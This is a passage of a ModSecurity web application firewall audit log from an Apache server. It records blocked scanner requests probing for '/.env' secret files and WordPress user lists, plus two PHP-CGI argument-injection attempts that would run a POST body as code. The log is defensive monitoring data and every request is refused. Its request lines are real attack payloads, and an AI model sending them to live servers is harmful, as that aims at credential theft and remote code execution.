X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; i1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 Accept-Charset: utf-8 --93fab063-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93fab063-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746131063357376 1090 (- - -) Stopwatch2: 1746131063357376 1090; combined=538, p1=500, p2=0, p3=0, p4=0, p5=37, sr=166, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93fab063-Z-- --61e3ff1d-A-- [02/May/2025:04:21:45 +0700] aBPl6RXwRgnphTBdhpRSMgAAAJc 103.236.140.4 59990 103.236.140.4 8181 --61e3ff1d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 137.184.165.148 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 137.184.165.148 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --61e3ff1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61e3ff1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746134505426871 9431 (- - -) Stopwatch2: 1746134505426871 9431; combined=17754, p1=217, p2=0, p3=0, p4=0, p5=8788, sr=55, sw=1, l=0, gc=8748 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61e3ff1d-Z-- --0a13e060-A-- [02/May/2025:05:06:57 +0700] aBPwgfNNWdC6CAybkqP62QAAANA 103.236.140.4 42890 103.236.140.4 8181 --0a13e060-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/80.0.262003652 Mobile/16F203 Safari/604.1 Accept-Charset: utf-8 --0a13e060-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a13e060-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746137217853930 859 (- - -) Stopwatch2: 1746137217853930 859; combined=387, p1=349, p2=0, p3=0, p4=0, p5=38, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a13e060-Z-- --13cfd503-A-- [02/May/2025:05:08:02 +0700] aBPwwqGyUvHV-cebb64ixQAAAEQ 103.236.140.4 43140 103.236.140.4 8181 --13cfd503-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: http Connection: close User-Agent: BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123 Accept-Charset: utf-8 --13cfd503-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13cfd503-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746137282714874 802 (- - -) Stopwatch2: 1746137282714874 802; combined=295, p1=259, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13cfd503-Z-- --11b3e27f-A-- [02/May/2025:07:19:00 +0700] aBQPdBXwRgnphTBdhpRb4QAAAIA 103.236.140.4 45444 103.236.140.4 8181 --11b3e27f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: iTunes/9.0.2 (Windows; N) Accept-Charset: utf-8 --11b3e27f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11b3e27f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746145140067881 823 (- - -) Stopwatch2: 1746145140067881 823; combined=331, p1=292, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11b3e27f-Z-- --9809a253-A-- [02/May/2025:07:23:47 +0700] aBQQk6GyUvHV-cebb64qLwAAAEI 103.236.140.4 46554 103.236.140.4 8181 --9809a253-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba Accept-Charset: utf-8 --9809a253-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9809a253-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746145427898004 777 (- - -) Stopwatch2: 1746145427898004 777; combined=343, p1=305, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9809a253-Z-- --914cae2c-A-- [02/May/2025:07:24:12 +0700] aBQQrPNNWdC6CAybkqMDvQAAAMM 103.236.140.4 46650 103.236.140.4 8181 --914cae2c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 156.239.214.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.239.214.224 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --914cae2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --914cae2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746145452261576 2624 (- - -) Stopwatch2: 1746145452261576 2624; combined=1371, p1=438, p2=900, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --914cae2c-Z-- --58c29a69-A-- [02/May/2025:09:23:55 +0700] aBQsu_NNWdC6CAybkqMFbAAAANQ 103.236.140.4 50742 103.236.140.4 8181 --58c29a69-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 137.184.165.148 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 137.184.165.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --58c29a69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58c29a69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746152635460868 775 (- - -) Stopwatch2: 1746152635460868 775; combined=309, p1=269, p2=0, p3=0, p4=0, p5=39, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58c29a69-Z-- --f379157c-A-- [02/May/2025:11:26:37 +0700] aBRJfcwZl97WzW7hutNP0gAAAAA 103.236.140.4 52186 103.236.140.4 8181 --f379157c-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 157.245.36.108 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 157.245.36.108 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f379157c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f379157c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746159997104216 856 (- - -) Stopwatch2: 1746159997104216 856; combined=293, p1=260, p2=0, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f379157c-Z-- --5915c032-A-- [02/May/2025:11:53:33 +0700] aBRPzaGyUvHV-cebb64sAQAAAEE 103.236.140.4 52628 103.236.140.4 8181 --5915c032-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 34.34.185.61 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 34.34.185.61 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --5915c032-C-- --5915c032-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5915c032-E-- --5915c032-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746161613958851 5004 (- - -) Stopwatch2: 1746161613958851 5004; combined=3516, p1=484, p2=3001, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5915c032-Z-- --dcdf094f-A-- [02/May/2025:12:21:46 +0700] aBRWaswZl97WzW7hutNQCwAAABI 103.236.140.4 53034 103.236.140.4 8181 --dcdf094f-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 188.166.108.93 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 188.166.108.93 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --dcdf094f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dcdf094f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746163306035375 686 (- - -) Stopwatch2: 1746163306035375 686; combined=248, p1=215, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dcdf094f-Z-- --e378a714-A-- [02/May/2025:12:28:34 +0700] aBRYAqGyUvHV-cebb64sMgAAAFA 103.236.140.4 53124 103.236.140.4 8181 --e378a714-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 167.71.175.236 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 167.71.175.236 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --e378a714-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e378a714-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746163714336969 769 (- - -) Stopwatch2: 1746163714336969 769; combined=293, p1=260, p2=0, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e378a714-Z-- --025ab419-A-- [02/May/2025:13:19:12 +0700] aBRj4BXwRgnphTBdhpReYwAAAIc 103.236.140.4 53778 103.236.140.4 8181 --025ab419-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 167.71.81.114 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 167.71.81.114 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --025ab419-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --025ab419-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746166752750360 827 (- - -) Stopwatch2: 1746166752750360 827; combined=353, p1=316, p2=0, p3=0, p4=0, p5=36, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --025ab419-Z-- --1006dc01-A-- [02/May/2025:14:04:00 +0700] aBRuYPNNWdC6CAybkqMG-wAAAMc 103.236.140.4 54162 103.236.140.4 8181 --1006dc01-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 68.183.9.16 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 68.183.9.16 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --1006dc01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1006dc01-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746169440522541 793 (- - -) Stopwatch2: 1746169440522541 793; combined=316, p1=280, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1006dc01-Z-- --15265971-A-- [02/May/2025:15:31:48 +0700] aBSC9MwZl97WzW7hutNUGAAAAAI 103.236.140.4 36650 103.236.140.4 8181 --15265971-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 167.71.81.114 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 167.71.81.114 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --15265971-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15265971-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746174708326227 747 (- - -) Stopwatch2: 1746174708326227 747; combined=265, p1=237, p2=0, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15265971-Z-- --0bcd6d3a-A-- [02/May/2025:15:56:31 +0700] aBSIv_NNWdC6CAybkqMJngAAAMQ 103.236.140.4 37322 103.236.140.4 8181 --0bcd6d3a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 112.78.36.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 112.78.36.210 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --0bcd6d3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bcd6d3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746176191107136 926 (- - -) Stopwatch2: 1746176191107136 926; combined=450, p1=411, p2=0, p3=0, p4=0, p5=38, sr=132, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bcd6d3a-Z-- --aa3bfa08-A-- [02/May/2025:15:56:33 +0700] aBSIwaGyUvHV-cebb64vKAAAAFM 103.236.140.4 37326 103.236.140.4 8181 --aa3bfa08-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 112.78.36.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 112.78.36.210 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --aa3bfa08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa3bfa08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746176193432174 700 (- - -) Stopwatch2: 1746176193432174 700; combined=300, p1=265, p2=0, p3=0, p4=0, p5=34, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa3bfa08-Z-- --73f8f256-A-- [02/May/2025:16:11:39 +0700] aBSMSxXwRgnphTBdhpRipQAAAIQ 103.236.140.4 37514 103.236.140.4 8181 --73f8f256-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.162 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --73f8f256-C-- --73f8f256-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73f8f256-E-- --73f8f256-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746177099953944 4365 (- - -) Stopwatch2: 1746177099953944 4365; combined=2819, p1=479, p2=2298, p3=0, p4=0, p5=41, sr=73, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73f8f256-Z-- --98b85937-A-- [02/May/2025:17:04:18 +0700] aBSYoswZl97WzW7hutNUygAAABQ 103.236.140.4 37954 103.236.140.4 8181 --98b85937-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.244.161.16 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.244.161.16 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --98b85937-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --98b85937-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746180258536437 830 (- - -) Stopwatch2: 1746180258536437 830; combined=344, p1=302, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98b85937-Z-- --5936b573-A-- [02/May/2025:17:14:34 +0700] aBSbCswZl97WzW7hutNU1wAAABQ 103.236.140.4 38052 103.236.140.4 8181 --5936b573-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.23.218.208 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.23.218.208 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --5936b573-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5936b573-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag 